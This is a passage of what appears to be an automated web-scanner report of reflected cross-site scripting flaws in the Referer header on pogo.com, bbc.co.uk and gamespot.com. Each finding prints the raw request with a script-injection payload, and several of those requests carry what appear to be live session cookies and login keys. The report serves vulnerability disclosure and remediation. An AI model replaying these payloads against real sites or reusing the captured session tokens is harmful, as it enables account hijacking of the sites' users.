Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /util/client-props.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e; Referer: http://www.google.com/search?hl=en&q=c14fe</script><script>alert(1)</script>03c013b122e
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a972b</script><script>alert(1)</script>84069feffea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v/11.1.9.13/applet/scrabble/ HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e; Referer: http://www.google.com/search?hl=en&q=a972b</script><script>alert(1)</script>84069feffea
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10ba1</script><script>alert(1)</script>022d3a73fd9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v/11.1.9.44/applet/jvmtest/ HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e; Referer: http://www.google.com/search?hl=en&q=10ba1</script><script>alert(1)</script>022d3a73fd9
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7208c</script><script>alert(1)</script>8221f99fc9b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=7208c</script><script>alert(1)</script>8221f99fc9b
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4af4</script><script>alert(1)</script>32744a0a28b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /games/bejeweled2 HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e4af4</script><script>alert(1)</script>32744a0a28b
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb427</script><script>alert(1)</script>cea094aa600 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rss HTTP/1.1 Host: rss.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=bb427</script><script>alert(1)</script>cea094aa600
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 538ca</script><script>alert(1)</script>81af36a11a3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?pageSection=footer_word HTTP/1.1 Host: word-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; op600clubpogogum=a00200200a2719m0337lk0d3e; Referer: http://www.google.com/search?hl=en&q=538ca</script><script>alert(1)</script>81af36a11a3
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68e47</script><script>alert(1)</script>9e203e837be was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /games/scrabble HTTP/1.1 Host: word-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; op600clubpogogum=a00200200a2719m0337lk0d3e; Referer: http://www.google.com/search?hl=en&q=68e47</script><script>alert(1)</script>9e203e837be
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9960f</script><script>alert(1)</script>42aee4319cf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /games/scrabble?pageSection=free_home_hot_games1_pl_scrabble HTTP/1.1 Host: word-games.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=9960f</script><script>alert(1)</script>42aee4319cf Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c325'-alert(1)-'53bf3b90fb1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/technology-12126880 HTTP/1.1 Host: www.bbc.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=6c325'-alert(1)-'53bf3b90fb1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3db8c"><a>32f7510c149 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: 3db8c"><a>32f7510c149
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7731c</script><script>alert(1)</script>e18aafb3c6f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=7731c</script><script>alert(1)</script>e18aafb3c6f Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536387265-New%7C1297128387265%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f55a</script><script>alert(1)</script>4d32471be0f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=7f55a</script><script>alert(1)</script>4d32471be0f
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc5f7</script><script>alert(1)</script>82ec750f525 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /account/my-account.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=bc5f7</script><script>alert(1)</script>82ec750f525 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536393024-New%7C1297128393024%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 990a5</script><script>alert(1)</script>ea916518bb7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /account/my-account/confirm-recover-password.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=990a5</script><script>alert(1)</script>ea916518bb7 Cache-Control: max-age=0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536429883-New%7C1297128429883%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e38fd</script><script>alert(1)</script>a0087aca4a3311088 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e862</script><script>alert(1)</script>4b4db4ca10a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /account/my-account/edit-checkout-settings.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=4e862</script><script>alert(1)</script>4b4db4ca10a Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536480861-New%7C1297128480861%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62c90</script><script>alert(1)</script>b96d37eb0ff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /account/my-account/main.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=62c90</script><script>alert(1)</script>b96d37eb0ff Cache-Control: max-age=0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536471206-New%7C1297128471206%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f349d</script><script>alert(1)</script>417f6300586 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /account/my-account/recover.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=f349d</script><script>alert(1)</script>417f6300586 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536425818-New%7C1297128425818%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9393</script><script>alert(1)</script>9d11b28022caefc05 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd99d</script><script>alert(1)</script>c16bfc7e88aeee608 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
